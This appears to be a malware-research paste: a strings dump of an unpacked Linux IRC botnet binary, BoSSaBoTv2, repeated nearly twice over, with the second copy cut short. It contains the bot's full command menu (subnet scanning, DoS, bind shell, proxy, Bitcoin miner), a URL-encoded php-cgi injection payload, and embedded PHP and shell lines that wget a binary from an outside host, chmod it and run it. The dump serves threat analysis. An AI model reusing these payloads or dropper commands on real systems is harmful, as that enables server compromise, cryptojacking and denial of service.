
BossaBot Moar ELF IRC skids, #MalwareMustDie

  1. # Für Malekal — ELF IRC skids, from #MalwareMustDie
  2. # Code: BossaBot
  3. # unpacked binaries — strings dump (file offset, string); the two dumps below appear to be identical:
  4. ---------
  5. 0000000000F4   /lib/ld-linux.so.2
  6. 00000000087D   libpthread.so.0
  7. 00000000088D   waitpid
  8. 00000000089A   connect
  9. 0000000008A2   pthread_exit
  10. 0000000008AF   pthread_create
  11. 0000000008BE   system
  12. 0000000008CA   accept
  13. 0000000008D1   write
  14. 0000000008E1   sendto
  15. 0000000008ED   sigaction
  16. 0000000008F7   __errno_location
  17. 000000000908   _Jv_RegisterClasses
  18. 00000000091C   libc.so.6
  19. 000000000926   strcpy
  20. 00000000092D   ioctl
  21. 000000000933   stdout
  22. 00000000093A   vsprintf
  23. 000000000943   strerror
  24. 00000000094C   snprintf
  25. 000000000955   __strtol_internal
  26. 000000000967   getpid
  27. 00000000096E   fgets
  28. 000000000974   memcpy
  29. 00000000097B   pclose
  30. 000000000987   malloc
  31. 00000000098E   sleep
  32. 000000000994   sysinfo
  33. 00000000099C   socket
  34. 0000000009A3   select
  35. 0000000009AA   fflush
  36. 0000000009B1   alarm
  37. 0000000009B7   popen
  38. 0000000009BD   calloc
  39. 0000000009C9   strcat
  40. 0000000009D5   inet_addr
  41. 0000000009DF   setsockopt
  42. 0000000009EA   strstr
  43. 0000000009F1   strncpy
  44. 0000000009F9   strcasecmp
  45. 000000000A04   __strdup
  46. 000000000A0D   bcopy
  47. 000000000A13   strtok
  48. 000000000A1A   listen
  49. 000000000A21   sscanf
  50. 000000000A28   inet_network
  51. 000000000A35   memset
  52. 000000000A3C   srand
  53. 000000000A42   getppid
  54. 000000000A4F   getcwd
  55. 000000000A56   gethostbyname
  56. 000000000A64   fgetc
  57. 000000000A6A   fclose
  58. 000000000A71   __ctype_b_loc
  59. 000000000A7F   access
  60. 000000000A86   __xstat
  61. 000000000A8E   inet_ntop
  62. 000000000A98   fopen
  63. 000000000A9E   _IO_stdin_used
  64. 000000000AAD   daemon
  65. 000000000AB4   __libc_start_main
  66. 000000000AC6   toupper
  67. 000000000ACE   strchr
  68. 000000000AD5   fputs
  69. 000000000ADB   mkdir
  70. 000000000AE1   vfprintf
  71. 000000000AEF   __gmon_start__
  72. 000000000AFE   GLIBC_2.1
  73. 000000000B08   GLIBC_2.0
  74. 000000000B12   GLIBC_2.3
  75. 000000001555   G    ]~4=
  76. 00000000177E   t,PRh
  77. 000000001DDE   Sj$h
  78. 00000000349F   YXj:S
  79. 000000003A1E   4$WSh
  80. 000000004F25   u&PSh
  81. 000000005D28   haxmedown.cz.cc
  82. 000000005D38   %s : USERID : UNIX : %s
  83. 000000005D51   NOTICE %s :Unknowning %s.
  84. 000000005D6C   NOTICE %s :Unable to comply.
  85. 000000005D8A   /cgi-bin/php
  86. 000000005D97   /cgi-bin/php5
  87. 000000005DA5   /cgi-bin/php-cgi
  88. 000000005DB6   /cgi-bin/php.cgi
  89. 000000005DC7   /cgi-bin/php4
  90. 000000005DD5   /cgi-bin/php5-cgi
  91. 000000005DE7   /cgi-bin/php4-cgi
  92. 000000005DF9   /cgi-bin/php5.cgi
  93. 000000005E0B   /cgi-bin/php4.cgi
  94. 000000005E1D   /cgi-bin/php52.cgi
  95. 000000005E30   /cgi-bin/php53.cgi
  96. 000000005E43   /cgi-bin/
  97. 000000005E4D   /cgi-sys/php-cgi
  98. 000000005E5E   /cgi-bin/info.php
  99. 000000005E70   /cgi-bin/php.fcgi
  100. 000000005E82   /cgi-bin/phpinfo.php
  101. 000000005E9C   Permission denied
  102. 000000005EAE   %d.%d.%d.%d
  103. 000000005EBA   %s.%i.%i.%i
  104. 000000005EC6   %s.%i.%i
  105. 000000005ECF   %s.%i
  106. 000000005ED5   NOTICE %s :              
  107. 000000005EF3   devchan
  108. 000000005F03   http://
  109. 000000005F0C   ./cache/
  110. 000000005F15   %s %s %s
  111. 000000005F22   HTTP/1.1
  112. 000000005F2B   HTTP/1.0
  113. 000000005F34   ./cache/%s
  114. 000000005F3F   Date:
  115. 000000005F45   HTTP/%f %d
  116. 000000005F50   %%%02X
  117. 000000005F57   %hu.%hu.%hu.%hu
  118. 000000005F67   UPDATE
  119. 000000005F6E   UNKNOWN
  120. 000000005F7B   SERVER
  121. 000000005F82   VERSION
  122. 000000005F8F   SCANRND
  123. 000000005F97   SCANSUBA
  124. 000000005FA0   SCANSUBB
  125. 000000005FA9   SCANSUBC
  126. 000000005FB7   SHELL
  127. 000000005FBD   PROXY
  128. 000000005FC3   SOCKS5
  129. 000000005FCA   MINER
  130. 000000005FD9   NOTICE %s :%s
  131. 000000005FF8   PRIVMSG
  132. 000000006005   TOPIC
  133. 00000000600B   /etc/init.d/rc.local
  134. 000000006020   "%s%s"
  135. 00000000602A   [sshd]
  136. 000000006036   ERROR
  137. 00000000603C   /etc/rc.conf
  138. 000000006049   rm -r /tmp/pool*
  139. 00000000605A   dummy
  140. 000000006060   4L2nJG5V
  141. 000000006069   NOTICE %s :UPDATEING
  142. 00000000607F   Linux
  143. 000000006085   NICK %s
  144. 00000000608E   NOTICE %s :NICK <nick>
  145. 0000000060A6   NOTICE %s :MOVE <server>
  146. 0000000060C0   MODE %s -x
  147. 0000000060CC   MODE %s +i
  148. 0000000060D8   JOIN %s :%s
  149. 0000000060E5   WHO %s
  150. 0000000060ED   PONG %s
  151. 000000006100   NOTICE %s :Removed all spoofs
  152. 000000006120   NOTICE %s :What kind of subnet address is that? Do something like: 169.40
  153. 000000006180   NOTICE %s :Unable to resolve %s
  154. 0000000061C0   NOTICE %s :UNKNOWN <target> <secs>
  155. 000000006200   POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73%%5F%%65%%6E%%76%%3D%%22%%79%%65%%73%%22+%%2D%%64+%%63%%67%%69%%2E%%66%%69%%78%%5F%%70%%61%%74%%68%%69%%6E%%66%%6F%%3D%%31+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%   0000000065DF      0   Host: %s
  156. 0000000065E9   User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0
  157. 000000006638   Content-Type: application/x-www-form-urlencoded
  158. 000000006669   Content-Length: %d
  159. 00000000667D   Connection: close
  160. 0000000066A0   <?php
  161. 0000000066A6   $tmp = sys_get_temp_dir();
  162. 0000000066C1   $path = getcwd();
  163. 0000000066D3   $file = "4L2nJG5V";
  164. 0000000066E7   $url = "con32.cz.cc";
  165. 0000000066FD   $wget = "wget";
  166. 00000000670D   $flag = "-P - -O";
  167. 000000006720   $chmod = "chmod -R 777";
  168. 000000006739   if (file_exists($tmp . "/$file"))
  169. 00000000675D   exit(1);
  170. 000000006766   }else{
  171. 00000000676D   echo($tmp);
  172. 000000006779   system("$wget $url $flag" . $tmp . "/$file");
  173. 0000000067A7   system("$chmod" . $tmp ."/$file");
  174. 0000000067CA   chmod ($tmp."/".$file,0777);
  175. 0000000067E7   system($tmp . "/$file 2>&1");
  176. 000000006805   exit(1);
  177. 000000006820   /cgi-bin/php5.cgi-20120725_by_SAKUR
  178. 000000006860   /phpMyAdmin/config/config.inc.php
  179. 0000000068A0   /phpmyadmin/config/config.inc.php
  180. 0000000068E0   NOTICE %s :
  181. 0000000068FD   [EXPLOiTiNG-IP:-%s-]
  182. 000000006940   NOTICE %s :
  183. 00000000695D   [Permission-denied:-%s-]
  184. 0000000069A0   NOTICE %s :
  185. 0000000069B4   [RANDOM-SCAN-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]-TIME-[-%s-]
  186. 000000006A00   NOTICE %s :
  187. 000000006A14   [WAITING-OF-THREADS]
  188. 000000006A40   NOTICE %s :
  189. 000000006A54   [SCAN-DONE]
  190. 000000006A80   NOTICE %s :
  191. 000000006A94   [SCAN-RUNNING!!!]
  192. 000000006AC0   NOTICE %s :
  193. 000000006AD4   [SUBNET-SCAN-A-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]
  194. 000000006B20   NOTICE %s :
  195. 000000006B34   [WAITING-OF-THREADS]
  196. 000000006B60   NOTICE %s :
  197. 000000006B74   [SCAN-RUNNING!!!
  198. 000000006BA0   NOTICE %s :
  199. 000000006BB4   [SUBNET-SCAN-B-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]
  200. 000000006C00   NOTICE %s :
  201. 000000006C14   [SUBNET-SCAN-C-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]
  202. 000000006C60   NOTICE %s :
  203. 000000006CA0   NOTICE %s :              
  204. 000000006CC2     BoSSaBoTv2 by BoSSaLiNiE
  205. 000000006CE0   NOTICE %s :              
  206. 000000006D60   NOTICE %s :
  207. 000000006DA0   NOTICE %s :              
  208. 000000006DC2     HELP
  209. 000000006DE0   NOTICE %s :              
  210. 000000006DFC   PRIVAT PRIVAT PRIVAT
  211. 000000006E20   NOTICE %s :              
  212. 000000006E3C   ALL COMMMANDS STARTS WITH !BOSS* or !BOSS|[500]*
  213. 000000006E80   NOTICE %s :              
  214. 000000006E9C   OR THE COMPLETE BOT !NICKNAME FOR CONTROLL ONLY ONE BOT
  215. 000000006EE0   NOTICE %s :              
  216. 000000006EFC   example !BOSS* scanrnd 192.168 500 30
  217. 000000006F40   NOTICE %s :              
  218. 000000006F62     SCANNING
  219. 000000006F80   NOTICE %s :              
  220. 000000006F9C   SCANRND <192 or 192.168 or 192.168.0> <threads> <minutes> = Random Scan
  221. 000000007000   NOTICE %s :              
  222. 00000000701C   SCANSUBA <192> <threads>                                  = Complete Subnet scan
  223. 000000007080   NOTICE %s :              
  224. 00000000709C   SCANSUBB <192.168> <threads>                              = Complete Subnet scan
  225. 000000007100   NOTICE %s :              
  226. 00000000711C   SCANSUBC <192.168.0> <threads>                            = Complete Subnet scan
  227. 000000007180   NOTICE %s :              
  228. 0000000071A2     DoS
  229. 0000000071C0   NOTICE %s :              
  230. 0000000071DC   UNKNOWN <target> <secs>
  231. 000000007200   NOTICE %s :              
  232. 00000000721C   NOTE YOU CANT STOP RUNNING SCANS
  233. 000000007240   NOTICE %s :              
  234. 000000007262     WARNING
  235. 000000007280   NOTICE %s :              
  236. 00000000729C   DO NOT ENTER MORE WHITE SPACES THAT ARE NEEDED
  237. 0000000072E0   NOTICE %s :              
  238. 0000000072FC   scanrnd 192.168.0   500 100 IS WRONG BOT WILL NOT SCAN
  239. 000000007340   NOTICE %s :              
  240. 00000000735C   scanrnd 192.168.0 500   100 IS WRONG BOT WILL NOT SCAN
  241. 0000000073A0   NOTICE %s :              
  242. 0000000073BC   scanrnd 192.168.0 500 100 IS RIGHT BOT WILL SCAN
  243. 000000007400   NOTICE %s :              
  244. 000000007422     REMOTE
  245. 000000007440   NOTICE %s :              
  246. 00000000745C   REMOTE CONTROLL SHELL
  247. 000000007480   NOTICE %s :              
  248. 00000000749C   !BOSS* SH uname -a
  249. 0000000074C0   NOTICE %s :              
  250. 0000000074DC   REMOTE CONTROLL IRC
  251. 000000007500   NOTICE %s :              
  252. 00000000751C   !BOSS* IRC join #bitchly
  253. 000000007540   NOTICE %s :              
  254. 00000000755C   REMOTE BIND SHELL
  255. 000000007580   NOTICE %s :              
  256. 00000000759C   !BOSS* SHELL
  257. 0000000075C0   NOTICE %s :              
  258. 0000000075DC   nc -vvn 192.168.0.1 31337
  259. 000000007600   NOTICE %s :              
  260. 000000007622     EOH
  261. 000000007640   NOTICE %s :
  262. 000000007654   GENERATING
  263. 000000007680   NOTICE %s :
  264. 000000007694   STARTING
  265. 0000000076C0   NOTICE %s :
  266. 0000000076D4   SOCKET
  267. 0000000076DD   CREATED
  268. 000000007700   NOTICE %s :
  269. 000000007740   NOTICE %s :
  270. 000000007754   WAITING
  271. 00000000775E   CONNECTION
  272. 000000007780   NOTICE %s :
  273. 000000007794   INCOMMING
  274. 0000000077A0   CONNECTION
  275. 0000000077C9   BoSSaBoTv2
  276. 0000000077D6   ACCESS
  277. 0000000077DF   GRANTED
  278. 000000007832   Enter password:
  279. 00000000786A   BoSSaBoTv2
  280. 000000007877   REMOTE
  281. 000000007880   SHELL
  282. 0000000078E0   NOTICE %s :
  283. 0000000078F4   DISCONNECTED
  284. 000000007960   NOTICE %s :
  285. 0000000079A0   NOTICE %s :
  286. 0000000079B4   SOCKET
  287. 0000000079BD   ERROR
  288. 0000000079E0   NOTICE %s :
  289. 0000000079F4   PROXY
  290. 0000000079FC   SERVER
  291. 000000007A05   READY
  292. 000000007A20   400 : BAD REQUEST
  293. 000000007A32   ONLY GET REQUESTS ARE ALLOWED
  294. 000000007A60   GET %s HTTP/1.0
  295. 000000007A71   Host: %s
  296. 000000007A7B   If-Modified-Since: %s
  297. 000000007A92   Connection: close
  298. 000000007AC0   GET %s HTTP/1.0
  299. 000000007AD1   Host: %s
  300. 000000007ADB   Connection: close
  301. 000000007B00   NOTICE %s :
  302. 000000007B14   SOCKS5
  303. 000000007B1D   SERVER
  304. 000000007B26   READY
  305. 000000007B33   PORT %d
  306. 000000007B40   export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s
  307. 000000007B80   NICK %s
  308. 000000007B88   USER %s localhost localhost :%s
  309. 000000007BC0   /tmp/minerd -t 4 -o stratum+tcp://%s:%s -O %s:%s -q -B 2>/dev/null &
  310. 000000007C20   pkill minerd ; pkill m32 ; pkill m64
  311. 000000007C60   wget -q tenet.dl.sourceforge.net/project/cpuminer/pooler-cpuminer-2.4-linux-x86.tar.gz -P /tmp
  312. 000000007CC0   tar -zxf /tmp/pooler-cpuminer-2.4-linux-x86.tar.gz -C /tmp
  313. 000000007D00   NOTICE %s :BTC CPU Miner Running For %s:%s with User %s:%s
  314. 000000007D40   pkill %s ; pkill %s ; rm -r /tmp/%s ; rm -r /tmp/%s ; wget %s -P - -O /tmp/%s ; wget %s -P - -O /tmp/%s ; chmod 777 /tmp/%s ; chmod 777 /tmp/%s ; /tmp/%s ; /tmp/%s
  315. 000000007E00   NOTICE %s :
  316. 000000007E1D   BoSSaBoTv2-%s
  317. 000000007E60   NOTICE %s :Nick cannot be larger than 9 characters.
  318. 000000008361   GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  319. 000000008394   GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  320. 0000000083C7   GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  321. 0000000083FA   GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  322. 00000000842D   GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  323. 000000008460   GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  324. 000000008493   .shstrtab
  325. 00000000849D   .interp
  326. 0000000084A5   .note.ABI-tag
  327. 0000000084B3   .hash
  328. 0000000084B9   .dynsym
  329. 0000000084C1   .dynstr
  330. 0000000084C9   .gnu.version
  331. 0000000084D6   .gnu.version_r
  332. 0000000084E5   .rel.dyn
  333. 0000000084EE   .rel.plt
  334. 0000000084F7   .init
  335. 0000000084FD   .text
  336. 000000008503   .fini
  337. 000000008509   .rodata
  338. 000000008511   .eh_frame
  339. 00000000851B   .data
  340. 000000008521   .dynamic
  341. 00000000852A   .ctors
  342. 000000008531   .dtors
  343. 000000008547   .comment
  344. 0000000000F4   /lib/ld-linux.so.2
  345. 00000000087D   libpthread.so.0
  346. 00000000088D   waitpid
  347. 00000000089A   connect
  348. 0000000008A2   pthread_exit
  349. 0000000008AF   pthread_create
  350. 0000000008BE   system
  351. 0000000008CA   accept
  352. 0000000008D1   write
  353. 0000000008E1   sendto
  354. 0000000008ED   sigaction
  355. 0000000008F7   __errno_location
  356. 000000000908   _Jv_RegisterClasses
  357. 00000000091C   libc.so.6
  358. 000000000926   strcpy
  359. 00000000092D   ioctl
  360. 000000000933   stdout
  361. 00000000093A   vsprintf
  362. 000000000943   strerror
  363. 00000000094C   snprintf
  364. 000000000955   __strtol_internal
  365. 000000000967   getpid
  366. 00000000096E   fgets
  367. 000000000974   memcpy
  368. 00000000097B   pclose
  369. 000000000987   malloc
  370. 00000000098E   sleep
  371. 000000000994   sysinfo
  372. 00000000099C   socket
  373. 0000000009A3   select
  374. 0000000009AA   fflush
  375. 0000000009B1   alarm
  376. 0000000009B7   popen
  377. 0000000009BD   calloc
  378. 0000000009C9   strcat
  379. 0000000009D5   inet_addr
  380. 0000000009DF   setsockopt
  381. 0000000009EA   strstr
  382. 0000000009F1   strncpy
  383. 0000000009F9   strcasecmp
  384. 000000000A04   __strdup
  385. 000000000A0D   bcopy
  386. 000000000A13   strtok
  387. 000000000A1A   listen
  388. 000000000A21   sscanf
  389. 000000000A28   inet_network
  390. 000000000A35   memset
  391. 000000000A3C   srand
  392. 000000000A42   getppid
  393. 000000000A4F   getcwd
  394. 000000000A56   gethostbyname
  395. 000000000A64   fgetc
  396. 000000000A6A   fclose
  397. 000000000A71   __ctype_b_loc
  398. 000000000A7F   access
  399. 000000000A86   __xstat
  400. 000000000A8E   inet_ntop
  401. 000000000A98   fopen
  402. 000000000A9E   _IO_stdin_used
  403. 000000000AAD   daemon
  404. 000000000AB4   __libc_start_main
  405. 000000000AC6   toupper
  406. 000000000ACE   strchr
  407. 000000000AD5   fputs
  408. 000000000ADB   mkdir
  409. 000000000AE1   vfprintf
  410. 000000000AEF   __gmon_start__
  411. 000000000AFE   GLIBC_2.1
  412. 000000000B08   GLIBC_2.0
  413. 000000000B12   GLIBC_2.3
  414. 000000001555   G    ]~4=
  415. 00000000177E   t,PRh
  416. 000000001DDE   Sj$h
  417. 00000000349F   YXj:S
  418. 000000003A1E   4$WSh
  419. 000000004F25   u&PSh
  420. 000000005D28   haxmedown.cz.cc
  421. 000000005D38   %s : USERID : UNIX : %s
  422. 000000005D51   NOTICE %s :Unknowning %s.
  423. 000000005D6C   NOTICE %s :Unable to comply.
  424. 000000005D8A   /cgi-bin/php
  425. 000000005D97   /cgi-bin/php5
  426. 000000005DA5   /cgi-bin/php-cgi
  427. 000000005DB6   /cgi-bin/php.cgi
  428. 000000005DC7   /cgi-bin/php4
  429. 000000005DD5   /cgi-bin/php5-cgi
  430. 000000005DE7   /cgi-bin/php4-cgi
  431. 000000005DF9   /cgi-bin/php5.cgi
  432. 000000005E0B   /cgi-bin/php4.cgi
  433. 000000005E1D   /cgi-bin/php52.cgi
  434. 000000005E30   /cgi-bin/php53.cgi
  435. 000000005E43   /cgi-bin/
  436. 000000005E4D   /cgi-sys/php-cgi
  437. 000000005E5E   /cgi-bin/info.php
  438. 000000005E70   /cgi-bin/php.fcgi
  439. 000000005E82   /cgi-bin/phpinfo.php
  440. 000000005E9C   Permission denied
  441. 000000005EAE   %d.%d.%d.%d
  442. 000000005EBA   %s.%i.%i.%i
  443. 000000005EC6   %s.%i.%i
  444. 000000005ECF   %s.%i
  445. 000000005ED5   NOTICE %s :              
  446. 000000005EF3   devchan
  447. 000000005F03   http://
  448. 000000005F0C   ./cache/
  449. 000000005F15   %s %s %s
  450. 000000005F22   HTTP/1.1
  451. 000000005F2B   HTTP/1.0
  452. 000000005F34   ./cache/%s
  453. 000000005F3F   Date:
  454. 000000005F45   HTTP/%f %d
  455. 000000005F50   %%%02X
  456. 000000005F57   %hu.%hu.%hu.%hu
  457. 000000005F67   UPDATE
  458. 000000005F6E   UNKNOWN
  459. 000000005F7B   SERVER
  460. 000000005F82   VERSION
  461. 000000005F8F   SCANRND
  462. 000000005F97   SCANSUBA
  463. 000000005FA0   SCANSUBB
  464. 000000005FA9   SCANSUBC
  465. 000000005FB7   SHELL
  466. 000000005FBD   PROXY
  467. 000000005FC3   SOCKS5
  468. 000000005FCA   MINER
  469. 000000005FD9   NOTICE %s :%s
  470. 000000005FF8   PRIVMSG
  471. 000000006005   TOPIC
  472. 00000000600B   /etc/init.d/rc.local
  473. 000000006020   "%s%s"
  474. 00000000602A   [sshd]
  475. 000000006036   ERROR
  476. 00000000603C   /etc/rc.conf
  477. 000000006049   rm -r /tmp/pool*
  478. 00000000605A   dummy
  479. 000000006060   4L2nJG5V
  480. 000000006069   NOTICE %s :UPDATEING
  481. 00000000607F   Linux
  482. 000000006085   NICK %s
  483. 00000000608E   NOTICE %s :NICK <nick>
  484. 0000000060A6   NOTICE %s :MOVE <server>
  485. 0000000060C0   MODE %s -x
  486. 0000000060CC   MODE %s +i
  487. 0000000060D8   JOIN %s :%s
  488. 0000000060E5   WHO %s
  489. 0000000060ED   PONG %s
  490. 000000006100   NOTICE %s :Removed all spoofs
  491. 000000006120   NOTICE %s :What kind of subnet address is that? Do something like: 169.40
  492. 000000006180   NOTICE %s :Unable to resolve %s
  493. 0000000061C0   NOTICE %s :UNKNOWN <target> <secs>
  494. 000000006200   POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73%%5F%%65%%6E%%76%%3D%%22%%79%%65%%73%%22+%%2D%%64+%%63%%67%%69%%2E%%66%%69%%78%%5F%%70%%61%%74%%68%%69%%6E%%66%%6F%%3D%%31+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%   0000000065DF      0   Host: %s
  495. 0000000065E9   User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0
  496. 000000006638   Content-Type: application/x-www-form-urlencoded
  497. 000000006669   Content-Length: %d
  498. 00000000667D   Connection: close
  499. 0000000066A0   <?php
  500. 0000000066A6   $tmp = sys_get_temp_dir();
  501. 0000000066C1   $path = getcwd();
  502. 0000000066D3   $file = "4L2nJG5V";
  503. 0000000066E7   $url = "con32.cz.cc";
  504. 0000000066FD   $wget = "wget";
  505. 00000000670D   $flag = "-P - -O";
  506. 000000006720   $chmod = "chmod -R 777";
  507. 000000006739   if (file_exists($tmp . "/$file"))
  508. 00000000675D   exit(1);
  509. 000000006766   }else{
  510. 00000000676D   echo($tmp);
  511. 000000006779   system("$wget $url $flag" . $tmp . "/$file");
  512. 0000000067A7   system("$chmod" . $tmp ."/$file");
  513. 0000000067CA   chmod ($tmp."/".$file,0777);
  514. 0000000067E7   system($tmp . "/$file 2>&1");
  515. 000000006805   exit(1);
  516. 000000006820   /cgi-bin/php5.cgi-20120725_by_SAKUR
  517. 000000006860   /phpMyAdmin/config/config.inc.php
  518. 0000000068A0   /phpmyadmin/config/config.inc.php
  519. 0000000068E0   NOTICE %s :
  520. 0000000068FD   [EXPLOiTiNG-IP:-%s-]
  521. 000000006940   NOTICE %s :
  522. 00000000695D   [Permission-denied:-%s-]
  523. 0000000069A0   NOTICE %s :
  524. 0000000069B4   [RANDOM-SCAN-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]-TIME-[-%s-]
  525. 000000006A00   NOTICE %s :
  526. 000000006A14   [WAITING-OF-THREADS]
  527. 000000006A40   NOTICE %s :
  528. 000000006A54   [SCAN-DONE]
  529. 000000006A80   NOTICE %s :
  530. 000000006A94   [SCAN-RUNNING!!!]
  531. 000000006AC0   NOTICE %s :
  532. 000000006AD4   [SUBNET-SCAN-A-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]
  533. 000000006B20   NOTICE %s :
  534. 000000006B34   [WAITING-OF-THREADS]
  535. 000000006B60   NOTICE %s :
  536. 000000006B74   [SCAN-RUNNING!!!
  537. 000000006BA0   NOTICE %s :
  538. 000000006BB4   [SUBNET-SCAN-B-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]
  539. 000000006C00   NOTICE %s :
  540. 000000006C14   [SUBNET-SCAN-C-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]
  541. 000000006C60   NOTICE %s :
  542. 000000006CA0   NOTICE %s :              
  543. 000000006CC2     BoSSaBoTv2 by BoSSaLiNiE
  544. 000000006CE0   NOTICE %s :              
  545. 000000006D60   NOTICE %s :
  546. 000000006DA0   NOTICE %s :              
  547. 000000006DC2     HELP
  548. 000000006DE0   NOTICE %s :              
  549. 000000006DFC   PRIVAT PRIVAT PRIVAT
  550. 000000006E20   NOTICE %s :              
  551. 000000006E3C   ALL COMMMANDS STARTS WITH !BOSS* or !BOSS|[500]*
  552. 000000006E80   NOTICE %s :              
  553. 000000006E9C   OR THE COMPLETE BOT !NICKNAME FOR CONTROLL ONLY ONE BOT
  554. 000000006EE0   NOTICE %s :              
  555. 000000006EFC   example !BOSS* scanrnd 192.168 500 30
  556. 000000006F40   NOTICE %s :              
  557. 000000006F62     SCANNING
  558. 000000006F80   NOTICE %s :              
  559. 000000006F9C   SCANRND <192 or 192.168 or 192.168.0> <threads> <minutes> = Random Scan
  560. 000000007000   NOTICE %s :              
  561. 00000000701C   SCANSUBA <192> <threads>                                  = Complete Subnet scan
  562. 000000007080   NOTICE %s :              
  563. 00000000709C   SCANSUBB <192.168> <threads>                              = Complete Subnet scan
  564. 000000007100   NOTICE %s :              
  565. 00000000711C   SCANSUBC <192.168.0> <threads>                            = Complete Subnet scan
  566. 000000007180   NOTICE %s :              
  567. 0000000071A2     DoS
  568. 0000000071C0   NOTICE %s :              
  569. 0000000071DC   UNKNOWN <target> <secs>
  570. 000000007200   NOTICE %s :              
  571. 00000000721C   NOTE YOU CANT STOP RUNNING SCANS
  572. 000000007240   NOTICE %s :              
  573. 000000007262     WARNING
  574. 000000007280   NOTICE %s :              
  575. 00000000729C   DO NOT ENTER MORE WHITE SPACES THAT ARE NEEDED
  576. 0000000072E0   NOTICE %s :              
  577. 0000000072FC   scanrnd 192.168.0   500 100 IS WRONG BOT WILL NOT SCAN
  578. 000000007340   NOTICE %s :              
  579. 00000000735C   scanrnd 192.168.0 500   100 IS WRONG BOT WILL NOT SCAN
  580. 0000000073A0   NOTICE %s :              
  581. 0000000073BC   scanrnd 192.168.0 500 100 IS RIGHT BOT WILL SCAN
  582. 000000007400   NOTICE %s :              
  583. 000000007422     REMOTE
  584. 000000007440   NOTICE %s :              
  585. 00000000745C   REMOTE CONTROLL SHELL
  586. 000000007480   NOTICE %s :              
  587. 00000000749C   !BOSS* SH uname -a
  588. 0000000074C0   NOTICE %s :              
  589. 0000000074DC   REMOTE CONTROLL IRC
  590. 000000007500   NOTICE %s :              
  591. 00000000751C   !BOSS* IRC join #bitchly
  592. 000000007540   NOTICE %s :              
  593. 00000000755C   REMOTE BIND SHELL
  594. 000000007580   NOTICE %s :              
  595. 00000000759C   !BOSS* SHELL
  596. 0000000075C0   NOTICE %s :              
  597. 0000000075DC   nc -vvn 192.168.0.1 31337
  598. 000000007600   NOTICE %s :              
  599. 000000007622     EOH
  600. 000000007640   NOTICE %s :
  601. 000000007654   GENERATING
  602. 000000007680   NOTICE %s :
  603. 000000007694   STARTING
  604. 0000000076C0   NOTICE %s :
  605. 0000000076D4   SOCKET
  606. 0000000076DD   CREATED
  607. 000000007700   NOTICE %s :
  608. 000000007740   NOTICE %s :
  609. 000000007754   WAITING
  610. 00000000775E   CONNECTION
  611. 000000007780   NOTICE %s :
  612. 000000007794   INCOMMING
  613. 0000000077A0   CONNECTION
  614. 0000000077C9   BoSSaBoTv2
  615. 0000000077D6   ACCESS
  616. 0000000077DF   GRANTED
  617. 000000007832   Enter password:
  618. 00000000786A   BoSSaBoTv2
  619. 000000007877   REMOTE
